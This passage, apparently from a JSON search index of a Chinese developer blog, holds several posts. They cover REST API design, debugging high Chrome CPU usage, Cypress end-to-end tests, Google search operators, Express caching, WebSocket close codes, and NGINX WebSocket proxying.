中提出来的一种万维网软件架构风格,目的是便于不同软件/程序在网络(例如互联网)中互相传递信息。表现层状态转换(REST,英文:Representational State Transfer)是根基于超文本传输协议(HTTP)之上而确定的一组约束和属性,是一种设计提供万维网络服务的软件构建风格。匹配或兼容于这种架构风格(简称为 REST 或 RESTful)的网络服务,允许客户端发出以统一资源标识符访问和操作网络资源的请求,而与预先定义好的无状态操作集一致化。wikipdeia\nREST API 不是一个标准或者一个是协议,仅仅是一种风格,一种style。\nRESTful API的简单定义可以轻松解释这个概念。 REST是一种架构风格,RESTful是它的解释。也就是说,如果您的后端服务器具有REST API,并且您(从网站/应用程序)向客户端请求此API,则您的客户端为RESTful。\n2. REST API最为重要的约束 Client-Server 通信只能由客户端单方面发起,表现为请求-响应的形式 Stateless 通信的会话状态(Session State)应该全部由客户端负责维护 Cache 响应内容可以在通信链的某处被缓存,以改善网络效率 Uniform Interface 通信链的组件之间通过统一的接口相互通信,以提高交互的可见性 Layered System 通过限制组件的行为(即每个组件只能“看到”与其交互的紧邻层),将架构分解为若干等级的层。 Code-On-Demand 支持通过下载并执行一些代码(例如Java Applet、Flash或JavaScript),对客户端的功能进行扩展。 3. REST API HTTP方法 与 CURD REST API 使用POST,GET, PUT, DELETE的HTTP方法来描述对资源的增、查、改、删。 这四个HTTP方法在数据层对应着SQL的插入、查询、更新、删除操作。","title":"Restful API 架构思考"},{"content":"1. 问题现象 有时候发现mac风扇响的厉害,于是我检查了mac系统的活动监视器,发现Google Chrome Helper占用99%的CPU。\n通常来说Chrome如果占用过高的内存,这并不是什么问题,毕竟Chrome的性能以及易用性是建立在占用很多内存的基础上的。但是无论什么程序,持续的占用超过80%的cpu,都是极不正常的。大多数程序都是占用维持在低于10%的CPU。\n活动监视器指出问题出现在Chrome浏览器。那么问题可以再次细分为三块。\nChrome系统自身问题 一些插件,例如flash插件,扩展插件 网页程序js出现的问题 2. 从任务管理器着手 其实Chrome浏览器自身也是有任务管理器的,一般来说windows版chrome按住shift+esc就会调出任务管理器窗口。mac版调出任务管理器没有快捷,只能通过Window \u0026gt; Task Manager调出。\n调出任务管理器后,发现一个标签页,CPU占用率达到99%, 那就说明,应该是这个标签页中存在持续占用大量CPU计算的程序。\n最后找到这个页面,发现该页面背景图是一种动态粒子图。就是基于particles.js做的。我想,终于找到你了。\n于是我把这个动态图的相关js代码给注释掉,电脑的风扇也终于变得安静了。\n3. 问题总结 问题解决的总结:解决问题的方法时很简单的,基于一个现象,找到一个原因,基于这个原因再找到一个现象,然后一步一步缩小问题范围,逼近最终原因。\n机器CPU过高,一般都是可以从任务管理器着手解决。系统的任务管理器可以监控各个程序占用的CPU是否正常,通常程序自身也是有任务管理的。\n像谷歌浏览器这种软件,几乎本身就是一个操作系统,所以说它的任务管理器也是必不可少的。Chrome浏览器再带的任务管理器可以告诉你几个关键信息。\n任务占用的内存 任务占用的CPU 任务占用的网络流量大小 如果你一打开谷歌浏览器,你的电脑风扇就拼命转,那你最好打开谷歌浏览器的任务管理器看看。\n4. 关于动态背景图的思考 动态背景图往往都会给人很酷炫的感觉,但是这种背景图的制作并不是很复杂,如果你使用particles.js来制作,制作一些动态背景图只需要几行代码就可以搞定。但是这种酷炫的背后,CPU也在承受着压力。\nparticles.js提供的demo效果图,在Chrome中CPU会被提高到100%。\n也有几家使用动态背景图的官网。我记得知乎以前就用过动态背景图,但是现在找不到了。另外一个使用动态背景图的是daocloud, CPU也是会在首页飙升到50%。\n所谓:强招必自损,动态背景图在给人以炫酷科技感的同时,也需要权衡这种技术对客户计算机的压力。\n另外,不要小看JavaScript, 它也可能引起大问题\n","permalink":"https://wdd.js.org/posts/2018/06/how-to-fix-google-chrome-very-high-cpu-cost/","summary":"1. 问题现象 有时候发现mac风扇响的厉害,于是我检查了mac系统的活动监视器,发现Google Chrome Helper占用99%的CPU。\n通常来说Chrome如果占用过高的内存,这并不是什么问题,毕竟Chrome的性能以及易用性是建立在占用很多内存的基础上的。但是无论什么程序,持续的占用超过80%的cpu,都是极不正常的。大多数程序都是占用维持在低于10%的CPU。\n活动监视器指出问题出现在Chrome浏览器。那么问题可以再次细分为三块。\nChrome系统自身问题 一些插件,例如flash插件,扩展插件 网页程序js出现的问题 2. 从任务管理器着手 其实Chrome浏览器自身也是有任务管理器的,一般来说windows版chrome按住shift+esc就会调出任务管理器窗口。mac版调出任务管理器没有快捷,只能通过Window \u0026gt; Task Manager调出。\n调出任务管理器后,发现一个标签页,CPU占用率达到99%, 那就说明,应该是这个标签页中存在持续占用大量CPU计算的程序。\n最后找到这个页面,发现该页面背景图是一种动态粒子图。就是基于particles.js做的。我想,终于找到你了。\n于是我把这个动态图的相关js代码给注释掉,电脑的风扇也终于变得安静了。\n3. 问题总结 问题解决的总结:解决问题的方法时很简单的,基于一个现象,找到一个原因,基于这个原因再找到一个现象,然后一步一步缩小问题范围,逼近最终原因。\n机器CPU过高,一般都是可以从任务管理器着手解决。系统的任务管理器可以监控各个程序占用的CPU是否正常,通常程序自身也是有任务管理的。\n像谷歌浏览器这种软件,几乎本身就是一个操作系统,所以说它的任务管理器也是必不可少的。Chrome浏览器再带的任务管理器可以告诉你几个关键信息。\n任务占用的内存 任务占用的CPU 任务占用的网络流量大小 如果你一打开谷歌浏览器,你的电脑风扇就拼命转,那你最好打开谷歌浏览器的任务管理器看看。\n4. 关于动态背景图的思考 动态背景图往往都会给人很酷炫的感觉,但是这种背景图的制作并不是很复杂,如果你使用particles.js来制作,制作一些动态背景图只需要几行代码就可以搞定。但是这种酷炫的背后,CPU也在承受着压力。\nparticles.js提供的demo效果图,在Chrome中CPU会被提高到100%。\n也有几家使用动态背景图的官网。我记得知乎以前就用过动态背景图,但是现在找不到了。另外一个使用动态背景图的是daocloud, CPU也是会在首页飙升到50%。\n所谓:强招必自损,动态背景图在给人以炫酷科技感的同时,也需要权衡这种技术对客户计算机的压力。\n另外,不要小看JavaScript, 它也可能引起大问题","title":"记一次如何解决谷歌浏览器占用过高cpu问题过程"},{"content":"某些IE浏览器location.origin属性是undefined,所以如果你要使用该属性,那么要注意做个能力检测。\nif (!window.location.origin) { window.location.origin = window.location.protocol + \u0026#34;//\u0026#34; + window.location.hostname + (window.location.port ? \u0026#39;:\u0026#39; + window.location.port: \u0026#39;\u0026#39;); }i ","permalink":"https://wdd.js.org/posts/2018/05/ie-not-support-location-origin/","summary":"某些IE浏览器location.origin属性是undefined,所以如果你要使用该属性,那么要注意做个能力检测。\nif (!window.location.origin) { window.location.origin = window.location.protocol + \u0026#34;//\u0026#34; + window.location.hostname + (window.location.port ? \u0026#39;:\u0026#39; + window.location.port: \u0026#39;\u0026#39;); }i ","title":"IE浏览器不支持location.origin"},{"content":"1. 目前E2E测试工具有哪些? 项目 Web Star puppeteer Chromium (~170Mb Mac, ~282Mb Linux, ~280Mb Win) 31906 nightmare Electron 15502 nightwatch WebDriver 8135 protractor selenium 7532 casperjs PhantomJS 7180 cypress Electron 5303 Zombie 不需要 4880 testcafe 不需要 4645 CodeceptJS webdriverio 1665 端到端测试一般都需要一个Web容器,来运行前端应用。例如Chromium, Electron, PhantomJS, WebDriver等等。\n从体积角度考虑,这些Web容器体积一般都很大。\n从速度的角度考虑:PhantomJS, WebDriver \u0026lt; Electon, Chromium。\n而且每个工具的侧重点也不同,建议按照需要去选择。\n2. 优秀的端到端测试工具应该有哪些特点? 安装简易:我希望它非常容易安装,最好可以一行命令就可以安装完毕 依赖较少:我只想做个E2E测试,不想安装jdk, python之类的东西 速度很快:运行测试用例的速度要快 报错详细:详细的报错 API完备:鼠标键盘操作接口,DOM查询接口等 Debug方便:出错了可以很方便的调试,而不是去猜 3. 为什么要用Cypress? Cypress基本上拥有了上面的特点之外,还有以下特点。\n时光穿梭 测试运行时,Cypress会自动截图,你可以轻易的查看每个时间的截图 Debug友好 不需要再去猜测为什么测试有失败了,Cypress提供Chrome DevTools, 所以Debug是非常方便的。 实时刷新 Cypress检测测试用例改变后,会自动刷新 自动等待 不需要在使用wait类似的方法等待某个DOM出现,Cypress会自动帮你做这些 Spies, stubs, and clocks Verify and control the behavior of functions, server responses, or timers. The same functionality you love from unit testing is right at your fingertips. 网络流量控制 在不涉及服务器的情况下轻松控制,存根和测试边缘案例。无论你喜欢,你都可以存储网络流量。 一致的结果 我们的架构不使用Selenium或WebDriver。向快速,一致和可靠的无剥落测试问好。 截图和视频 查看失败时自动截取的截图,或无条件运行时整个测试套件的视频。 4. 安装cypress 4.1. 使用npm方法安装 注意这个方法需要下载压缩过Electron, 所以可能会花费几分钟时间,请耐心等待。\nnpm i cypress -D 4.2. 直接下载Cypress客户端 你可以把Cypress想想成一个浏览器,可以单独把它下载下来,安装到电脑上,当做一个客户端软件来用。\n打开之后就是这个样子,可以手动去打开项目,运行测试用例。\n5. 初始化Cypress Cypress初始化,会在项目根目录自动生成cypress文件夹,并且里面有些测试用例模板,可以很方便的学习。\n初始化的方法有两种。\n如果你下载的客户端,那么你用客户端打开项目时,它会检测项目目录下有没有Cypress目录,如果没有,就自动帮你生成模板。\n如果你使用npm安装的Cypress,可以使用命令node_modules/.bin/cypress open去初始化\n6. 编写测试用例 // hacker-news.js describe(\u0026#39;Hacker News登录测试\u0026#39;, () =\u0026gt; { it(\u0026#39;登录页面\u0026#39;, () =\u0026gt; { cy.visit(\u0026#39;https://news.ycombinator.com/login?goto=news\u0026#39;) cy.get(\u0026#39;input[name=\u0026#34;acct\u0026#34;]\u0026#39;).eq(0).type(\u0026#39;test\u0026#39;) cy.get(\u0026#39;input[name=\u0026#34;pw\u0026#34;]\u0026#39;).eq(0).type(\u0026#39;123456\u0026#39;) cy.get(\u0026#39;input[value=\u0026#34;login\u0026#34;]\u0026#39;).click() cy.contains(\u0026#39;Bad login\u0026#39;) }) }) 7. 查看结果 打开Cypress客户端,选择要测试项目的根目录,点击hacker-news.js后,测试用例就会自动运行\n运行结束后,左侧栏目鼠标移动上去,右侧栏都会显示出该步骤的截图,所以叫做时光穿梭功能。\n从截图也可以看出来,Cypress的步骤描述很详细。\n","permalink":"https://wdd.js.org/posts/2018/05/e2e-testing-hacker-news-with-cypress/","summary":"1. 目前E2E测试工具有哪些? 项目 Web Star puppeteer Chromium (~170Mb Mac, ~282Mb Linux, ~280Mb Win) 31906 nightmare Electron 15502 nightwatch WebDriver 8135 protractor selenium 7532 casperjs PhantomJS 7180 cypress Electron 5303 Zombie 不需要 4880 testcafe 不需要 4645 CodeceptJS webdriverio 1665 端到端测试一般都需要一个Web容器,来运行前端应用。例如Chromium, Electron, PhantomJS, WebDriver等等。\n从体积角度考虑,这些Web容器体积一般都很大。\n从速度的角度考虑:PhantomJS, WebDriver \u0026lt; Electon, Chromium。\n而且每个工具的侧重点也不同,建议按照需要去选择。\n2. 优秀的端到端测试工具应该有哪些特点? 安装简易:我希望它非常容易安装,最好可以一行命令就可以安装完毕 依赖较少:我只想做个E2E测试,不想安装jdk, python之类的东西 速度很快:运行测试用例的速度要快 报错详细:详细的报错 API完备:鼠标键盘操作接口,DOM查询接口等 Debug方便:出错了可以很方便的调试,而不是去猜 3. 为什么要用Cypress? Cypress基本上拥有了上面的特点之外,还有以下特点。\n时光穿梭 测试运行时,Cypress会自动截图,你可以轻易的查看每个时间的截图 Debug友好 不需要再去猜测为什么测试有失败了,Cypress提供Chrome DevTools, 所以Debug是非常方便的。 实时刷新 Cypress检测测试用例改变后,会自动刷新 自动等待 不需要在使用wait类似的方法等待某个DOM出现,Cypress会自动帮你做这些 Spies, stubs, and clocks Verify and control the behavior of functions, server responses, or timers.","title":"端到端测试哪家强?不容错过的Cypress"},{"content":" 1. 谷歌搜索指令 2. 基本命令 3. 关键词使用 4. 特殊工具 4.1. define 快速返回关键词定义 4.2. 计算器 4.3. 单位转换 4.4. 时区查询 4.5. 地区查询 4.6. 天气查询 5. 参考 1. 谷歌搜索指令 2. 基本命令 符号 简介 语法 注意点 示例 | 包含A且必须包含B | A +B | A和+之间有空格 | Maxwell +wills | 包含A且不包含B | A -B | A和+之间有空格 | Maxwell -Absolom \u0026quot; \u0026quot; | 完整匹配AB | \u0026ldquo;AB\u0026rdquo; | | \u0026ldquo;Thomas Jefferson\u0026rdquo; OR | 包含A或者B | A OR B 或者 A | B | | nodejs OR webpack +-\u0026ldquo;OR | 指令可以组合,完成更复杂的查询 | | | beach -sandy +albert +nathaniel ~ | 包含A, 并且包含B的近义词 | A ~B | | github ~js .. | 区间查询 AB之间 | A..B | | china 1888..2000 | 匹配任意字符 | | | node* java site: | 站内搜索 | A site:B | | | DLL site:webpack.js.org filetype: | 按照文件类型搜索 | A filetype:B | | csta filetype:pdf 3. 关键词使用 方法 说明 示例 列举关键词 列举所有和搜索相关的关键词,并且尽量把重要的关键词排在前面。不同的关键词顺序会导致不同的返回不同的结果 书法 毛笔 绘画 不要使用某些词 如代词介词语气词,如i, the, of, it, 我,吗 搜索引擎一般会直接忽略这些信息含量少的词 大小写不敏感 大写字符和小写字符在搜索引擎看没有区别,尽量使用小写的就可以 4. 特殊工具 4.1. define 快速返回关键词定义 4.2. 计算器 4.3. 单位转换 4.4. 时区查询 4.5. 地区查询 4.6. 天气查询 5. 参考 Advanced Google Search Commands Google_rules_for_searching.pdf An introduction to search commands ","permalink":"https://wdd.js.org/posts/2018/04/master-google-search-command/","summary":"1. 谷歌搜索指令 2. 基本命令 3. 关键词使用 4. 特殊工具 4.1. define 快速返回关键词定义 4.2. 计算器 4.3. 单位转换 4.4. 时区查询 4.5. 地区查询 4.6. 天气查询 5. 参考 1. 谷歌搜索指令 2. 基本命令 符号 简介 语法 注意点 示例 | 包含A且必须包含B | A +B | A和+之间有空格 | Maxwell +wills | 包含A且不包含B | A -B | A和+之间有空格 | Maxwell -Absolom \u0026quot; \u0026quot; | 完整匹配AB | \u0026ldquo;AB\u0026rdquo; | | \u0026ldquo;Thomas Jefferson\u0026rdquo; OR | 包含A或者B | A OR B 或者 A | B | | nodejs OR webpack +-\u0026ldquo;OR | 指令可以组合,完成更复杂的查询 | | | beach -sandy +albert +nathaniel ~ | 包含A, 并且包含B的近义词 | A ~B | | github ~js .","title":"掌握谷歌搜索高级指令"},{"content":"1. 角色划分 名称 角色 账户 A 银行家 0 B 建筑商 100万 C 商人 0 2. 建筑商向银行存储100万 名称 角色 账户 A 银行家 100万 现金 B 建筑商 100万 支票 C 商人 0 2. 商人向银行贷款100万 此时银行的账户存款已经是0了,但是B还在银行存了100万。那银行究竟是还有100万呢, 还是一毛都没有了呢。\n此时建筑商如果要取现金,那么银行马上就要破产。\n名称 角色 账户 A 银行家 100现金 B 建筑商 100万 支票 C 商人 100万 支票 3. 商人需要建筑商来建造房子 商人需要建筑商来建筑房子,费用是100万,付给建筑商,建筑商又把100支票存到银行\n名称 角色 账户 A 银行家 100万现金 B 建筑商 200万 支票 C 商人 0 商人又从银行借钱100万,来付给建筑商建房子,建筑商把钱存到银行\n名称 角色 账户 A 银行家 100万现金 B 建筑商 300万 支票 C 商人 0 只要这个循环还在继续,你会发现,建筑商的账面上的支票越来越多,但是银行始终都是100万现金存在那里,从来都没动过。\n💰就这样魔术般的产生, 如果银行那一天缺钱了,银行就拿一张纸出来,上面写着1000万。看!银行造钱就是那么容易。\n","permalink":"https://wdd.js.org/posts/2018/04/the-secret-of-bank-create-money/","summary":"1. 角色划分 名称 角色 账户 A 银行家 0 B 建筑商 100万 C 商人 0 2. 建筑商向银行存储100万 名称 角色 账户 A 银行家 100万 现金 B 建筑商 100万 支票 C 商人 0 2. 商人向银行贷款100万 此时银行的账户存款已经是0了,但是B还在银行存了100万。那银行究竟是还有100万呢, 还是一毛都没有了呢。\n此时建筑商如果要取现金,那么银行马上就要破产。\n名称 角色 账户 A 银行家 100现金 B 建筑商 100万 支票 C 商人 100万 支票 3. 商人需要建筑商来建造房子 商人需要建筑商来建筑房子,费用是100万,付给建筑商,建筑商又把100支票存到银行\n名称 角色 账户 A 银行家 100万现金 B 建筑商 200万 支票 C 商人 0 商人又从银行借钱100万,来付给建筑商建房子,建筑商把钱存到银行\n名称 角色 账户 A 银行家 100万现金 B 建筑商 300万 支票 C 商人 0 只要这个循环还在继续,你会发现,建筑商的账面上的支票越来越多,但是银行始终都是100万现金存在那里,从来都没动过。","title":"金钱游戏 - 银行造钱的秘密"},{"content":"1. Express设置缓存 Express设置静态文件的方法很简单,一行代码搞定。app.use(express.static(path.join(__dirname, 'public'), {maxAge: MAX_AGE})), 注意MAX_AGE的单位是毫秒。这句代码的含义是让pulic目录下的所有文件都可以在浏览器中缓存,过期时长为MAX_AGE毫秒。\napp.use(express.static(path.join(__dirname, \u0026#39;public\u0026#39;), {maxAge: config.get(\u0026#39;maxAge\u0026#39;)})) 2. Express让浏览器清除缓存 缓存的好处是可以更快的访问服务,但是缓存也有坏处。例如设置缓存为10天,第二天的时候服务更新了。如果客户端不强制刷新页面的话,浏览器会一致使用更新前的静态文件,这样会导致一些BUG。你总当每次出问题时,客户打电话给你后,你让他强制刷新浏览器吧?\n所以,最好在服务重启后,重新让浏览器获取最新的静态文件。\n设置的方式是给每一个静态文件设置一个时间戳。\n例如:vendor/loadjs/load.js?_=123898923423\u0026quot;\u0026gt;\u0026lt;/script\u0026gt;\n2.1. Express 路由 // /routes/index.js router.get(\u0026#39;/home\u0026#39;, function (req, res, next) { res.render(\u0026#39;home\u0026#39;, {config: config, serverStartTimestamp: new Date().getTime()}) }) 2.2. 视图文件 // views/home.html \u0026lt;script src=\u0026#34;vendor/loadjs/load.js?_=\u0026lt;%= serverStartTimestamp %\u0026gt;\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; 设置之后,每次服务更新或者重启,浏览器都会使用最新的时间戳serverStartTimestamp,去获取静态文件。\n2.3. 动态加载JS文件 有时候js文件并不是直接在HTML中引入,可能是使用了一些js文件加载库,例如requirejs, LABjs等。这些情况下,可以在全局设置环境变量SERVER_START_TIMESTAMP,用来表示服务启动的时间戳,在获取js的时候,将该时间戳拼接在路径上。\n注意:环境变量SERVER_START_TIMESTAMP,一定要在其他脚本使用前定义。\n// views/home.html \u0026lt;script\u0026gt; var SERVER_START_TIMESTAMP = \u0026lt;%= serverStartTimestamp %\u0026gt; \u0026lt;/script\u0026gt; // load.js \u0026#39;vendor/contact-center/skill.js?_=\u0026#39; + SERVER_START_TIMESTAMP ","permalink":"https://wdd.js.org/posts/2018/04/express-static-file-cache-setting-and-cleaning/","summary":"1. Express设置缓存 Express设置静态文件的方法很简单,一行代码搞定。app.use(express.static(path.join(__dirname, 'public'), {maxAge: MAX_AGE})), 注意MAX_AGE的单位是毫秒。这句代码的含义是让pulic目录下的所有文件都可以在浏览器中缓存,过期时长为MAX_AGE毫秒。\napp.use(express.static(path.join(__dirname, \u0026#39;public\u0026#39;), {maxAge: config.get(\u0026#39;maxAge\u0026#39;)})) 2. Express让浏览器清除缓存 缓存的好处是可以更快的访问服务,但是缓存也有坏处。例如设置缓存为10天,第二天的时候服务更新了。如果客户端不强制刷新页面的话,浏览器会一致使用更新前的静态文件,这样会导致一些BUG。你总当每次出问题时,客户打电话给你后,你让他强制刷新浏览器吧?\n所以,最好在服务重启后,重新让浏览器获取最新的静态文件。\n设置的方式是给每一个静态文件设置一个时间戳。\n例如:vendor/loadjs/load.js?_=123898923423\u0026quot;\u0026gt;\u0026lt;/script\u0026gt;\n2.1. Express 路由 // /routes/index.js router.get(\u0026#39;/home\u0026#39;, function (req, res, next) { res.render(\u0026#39;home\u0026#39;, {config: config, serverStartTimestamp: new Date().getTime()}) }) 2.2. 视图文件 // views/home.html \u0026lt;script src=\u0026#34;vendor/loadjs/load.js?_=\u0026lt;%= serverStartTimestamp %\u0026gt;\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; 设置之后,每次服务更新或者重启,浏览器都会使用最新的时间戳serverStartTimestamp,去获取静态文件。\n2.3. 动态加载JS文件 有时候js文件并不是直接在HTML中引入,可能是使用了一些js文件加载库,例如requirejs, LABjs等。这些情况下,可以在全局设置环境变量SERVER_START_TIMESTAMP,用来表示服务启动的时间戳,在获取js的时候,将该时间戳拼接在路径上。\n注意:环境变量SERVER_START_TIMESTAMP,一定要在其他脚本使用前定义。\n// views/home.html \u0026lt;script\u0026gt; var SERVER_START_TIMESTAMP = \u0026lt;%= serverStartTimestamp %\u0026gt; \u0026lt;/script\u0026gt; // load.js \u0026#39;vendor/contact-center/skill.js?_=\u0026#39; + SERVER_START_TIMESTAMP ","title":"Express静态文件浏览器缓存设置与缓存清除"},{"content":"1. 把错误打印出来 WebSocket断开的原因有很多,最好在WebSocket断开时,将错误打印出来。\n在线demo地址:https://wdd.js.org/websocket-demos/\nws.onerror = function (e) { console.log(\u0026#39;WebSocket发生错误: \u0026#39; + e.code) console.log(e) } 如果你想自己玩玩WebSocket, 但是你又不想自己部署一个WebSocket服务器,你可以使用ws = new WebSocket('wss://echo.websocket.org/'), 你向echo.websocket.org发送消息,它会回复你同样的消息。\n2. 重要信息错误状态码 WebSocket断开时,会触发CloseEvent, CloseEvent会在连接关闭时发送给使用 WebSockets 的客户端. 它在 WebSocket 对象的 onclose 事件监听器中使用。CloseEvent的code字段表示了WebSocket断开的原因。可以从该字段中分析断开的原因。\n3. 关闭状态码表 一般来说1006的错误码出现的情况比较常见,该错误码一般出现在断网时。\n状态码 名称 描述 0–999 保留段, 未使用. 1000 CLOSE_NORMAL 正常关闭; 无论为何目的而创建, 该链接都已成功完成任务. 1001 CLOSE_GOING_AWAY 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 1002 CLOSE_PROTOCOL_ERROR 由于协议错误而中断连接. 1003 CLOSE_UNSUPPORTED 由于接收到不允许的数据类型而断开连接 (如仅接收文本数据的终端接收到了二进制数据). 1004 保留. 其意义可能会在未来定义. 1005 CLOSE_NO_STATUS 保留. 表示没有收到预期的状态码. 1006 CLOSE_ABNORMAL 保留. 用于期望收到状态码时连接非正常关闭 (也就是说, 没有发送关闭帧). 1007 Unsupported Data 由于收到了格式不符的数据而断开连接 (如文本消息中包含了非 UTF-8 数据). 1008 Policy Violation 由于收到不符合约定的数据而断开连接. 这是一个通用状态码, 用于不适合使用 1003 和 1009 状态码的场景. 1009 CLOSE_TOO_LARGE 由于收到过大的数据帧而断开连接. 1010 Missing Extension 客户端期望服务器商定一个或多个拓展, 但服务器没有处理, 因此客户端断开连接. 1011 Internal Error 客户端由于遇到没有预料的情况阻止其完成请求, 因此服务端断开连接. 1012 Service Restart 服务器由于重启而断开连接. 1013 Try Again Later 服务器由于临时原因断开连接, 如服务器过载因此断开一部分客户端连接. 1014 由 WebSocket标准保留以便未来使用. 1015 TLS Handshake 保留. 表示连接由于无法完成 TLS 握手而关闭 (例如无法验证服务器证书). 1016–1999 由 WebSocket标准保留以便未来使用. 2000–2999 由 WebSocket拓展保留使用. 3000–3999 可以由库或框架使用.? 不应由应用使用. 可以在 IANA 注册, 先到先得. 4000–4999 可以由应用使用. 4. 其他注意事项 如果你的服务所在的域是HTTPS的,那么使用的WebSocket协议也必须是wss, 而不能是ws\n5. 如何在老IE上使用原生WebSocket? web-socket-js是基于flash的技术,只需要引入两个js文件和一个swf文件,就可以让浏览器用于几乎原生的WebSocket接口。另外,web-socket-js还是需要在ws服务端843端口做一个flash安全策略文件的服务。\n我自己曾经基于stompjs和web-socket-js,做WebSocket兼容到IE5, 当然了stompjs在低版本的IE上有兼容性问题, 而且stompjs已经不再维护了,你可以使用我fork的一个版本,地址是:https://github.com/wangduanduan/stomp-websocket/blob/master/lib/stomp.js\n主要是老版本IE在正则表达式行为方面有点异常。\n// fix ie8, ie9, RegExp not normal problem // in chrome the frames length will be 2, but in ie8, ie9, it well be 1 // by wdd 20180321 if (frames.length === 1) { frames.push(\u0026#39;\u0026#39;) } 6. 参考 CloseEvent getting the reason why websockets closed with close code 1006 Defined Status Codes ","permalink":"https://wdd.js.org/posts/2018/03/websocket-close-reasons/","summary":"1. 把错误打印出来 WebSocket断开的原因有很多,最好在WebSocket断开时,将错误打印出来。\n在线demo地址:https://wdd.js.org/websocket-demos/\nws.onerror = function (e) { console.log(\u0026#39;WebSocket发生错误: \u0026#39; + e.code) console.log(e) } 如果你想自己玩玩WebSocket, 但是你又不想自己部署一个WebSocket服务器,你可以使用ws = new WebSocket('wss://echo.websocket.org/'), 你向echo.websocket.org发送消息,它会回复你同样的消息。\n2. 重要信息错误状态码 WebSocket断开时,会触发CloseEvent, CloseEvent会在连接关闭时发送给使用 WebSockets 的客户端. 它在 WebSocket 对象的 onclose 事件监听器中使用。CloseEvent的code字段表示了WebSocket断开的原因。可以从该字段中分析断开的原因。\n3. 关闭状态码表 一般来说1006的错误码出现的情况比较常见,该错误码一般出现在断网时。\n状态码 名称 描述 0–999 保留段, 未使用. 1000 CLOSE_NORMAL 正常关闭; 无论为何目的而创建, 该链接都已成功完成任务. 1001 CLOSE_GOING_AWAY 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 1002 CLOSE_PROTOCOL_ERROR 由于协议错误而中断连接. 1003 CLOSE_UNSUPPORTED 由于接收到不允许的数据类型而断开连接 (如仅接收文本数据的终端接收到了二进制数据). 1004 保留. 其意义可能会在未来定义. 1005 CLOSE_NO_STATUS 保留. 表示没有收到预期的状态码. 1006 CLOSE_ABNORMAL 保留. 用于期望收到状态码时连接非正常关闭 (也就是说, 没有发送关闭帧).","title":"WebSocket断开原因分析"},{"content":"无论什么语言,都需要逻辑,而逻辑中,能否判断出真假,是最基本也是最重要技能之一。\nJS中的假值有6个 false '' undefinded null 0, +0, -0 NaN 有点类似假值的真值有两个 {} [] 空对象和空数组,很多初学者都很用把这两个当做假值。但是实际上他们是真值,你只需要记住,除了null之外的所有对象类型的数据,都是真值。\ntypeof null // \u0026#39;object\u0026#39; 据说:typeof null返回对象这是一个js语言中的bug。实际上typeof null应该返回null才比较准确,但是这个bug已经存来好久了。几乎所有的代码里都这样去判断。如果把typeof null给改成返回null, 那么这必定会导致JS世界末日。\n我们承认JS并不完美,她有很多小缺点,但是这并不妨碍她吸引万千开发者拜倒在她的石榴裙下。\n就像一首歌唱的:有些人说不清哪里好 但就是谁都替代不了\n","permalink":"https://wdd.js.org/posts/2018/03/js-true-and-false-value/","summary":"无论什么语言,都需要逻辑,而逻辑中,能否判断出真假,是最基本也是最重要技能之一。\nJS中的假值有6个 false '' undefinded null 0, +0, -0 NaN 有点类似假值的真值有两个 {} [] 空对象和空数组,很多初学者都很用把这两个当做假值。但是实际上他们是真值,你只需要记住,除了null之外的所有对象类型的数据,都是真值。\ntypeof null // \u0026#39;object\u0026#39; 据说:typeof null返回对象这是一个js语言中的bug。实际上typeof null应该返回null才比较准确,但是这个bug已经存来好久了。几乎所有的代码里都这样去判断。如果把typeof null给改成返回null, 那么这必定会导致JS世界末日。\n我们承认JS并不完美,她有很多小缺点,但是这并不妨碍她吸引万千开发者拜倒在她的石榴裙下。\n就像一首歌唱的:有些人说不清哪里好 但就是谁都替代不了","title":"js中的真值和假值"},{"content":"1. AWS EC2 不支持WebSocket 直达解决方案 英文版\n简单说一下思路:WebSocket底层基于TCP协议的,如果你的服务器基于HTTP协议暴露80端口,那WebSocket肯定无法连接。你只要将HTTP协议修改成TCP协议就可以了。\n然后是安全组的配置:\n同样如果使用了NGINX作为反向代理,那么NGINX也需要做配置的。\n// https://gist.githubusercontent.com/unshift/324be6a8dc9e880d4d670de0dc97a8ce/raw/29507ed6b3c9394ecd7842f9d3228827cffd1c58/elasticbeanstalk_websockets files: \u0026#34;/etc/nginx/conf.d/01_websockets.conf\u0026#34; : mode: \u0026#34;000644\u0026#34; owner: root group: root content : | upstream nodejs { server 127.0.0.1:8081; keepalive 256; } server { listen 8080; location / { proxy_pass http://nodejs; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection \u0026#34;upgrade\u0026#34;; proxy_http_version 1.1; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } } \u0026#34;/opt/elasticbeanstalk/hooks/appdeploy/enact/41_remove_eb_nginx_confg.sh\u0026#34;: mode: \u0026#34;000755\u0026#34; owner: root group: root content : | mv /etc/nginx/conf.d/00_elastic_beanstalk_proxy.conf /etc/nginx/conf.d/00_elastic_beanstalk_proxy.conf.old 2. NGINX做反向代理是需要注意的问题 如果排除所有问题后,那剩下的问题可以考虑出在反向代理上,一下有几点是可以考虑的。\nHTTP的版本问题: http有三个版本,http 1.0, 1.1, 2.0, 现在主流的浏览器都是使用http 1.1版本,为了保证更好的兼容性,最好转发时不要修改协议的版本号\nNGINX具有路径重写功能,如果你使用了该功能,就要考虑问题可能出在这里,因为NGINX在路径重写时,需要对路径进行编解码,有可能在解码之后,没有编码就发送给后端的服务器,导致后端服务器无法对URL进行解码。\n3. IE8 IE9 有没有简单方便支持WebSocket的方案 目前测试下来,最简单方案是基于flash的。参考:https://github.com/gimite/web-socket-js,\n注意该方案需要在WebSocket服务上的843端口, 提供socket_policy_files, 也可以参考:A PolyFill for WebSockets\n网上也有教程是使用socket.io基于ajax长轮训的方案,如果服务端已经确定的情况下,一般是不会轻易改动服务端代码的。而且ajax长轮训也是有延迟,和disconnect时,无法回调的问题。\n4. stompjs connected后,没有调用connect_callBack 该问题主要是使用web-socket-js,在ie8,ie9上出现的\n该问题还没有分析出原因,但是看了stompjs的源码不是太多,明天用源码调试看看原因。\n问题已经找到,请参考:https://github.com/wangduanduan/stomp-websocket#about-ie8-ie9-use-websocket\n5. 参考文献 STOMP Over WebSocket STOMP Protocol Specification, Version 1.1 Stomp Over Websocket文档, ","permalink":"https://wdd.js.org/posts/2018/03/stomp-over-websocket/","summary":"1. AWS EC2 不支持WebSocket 直达解决方案 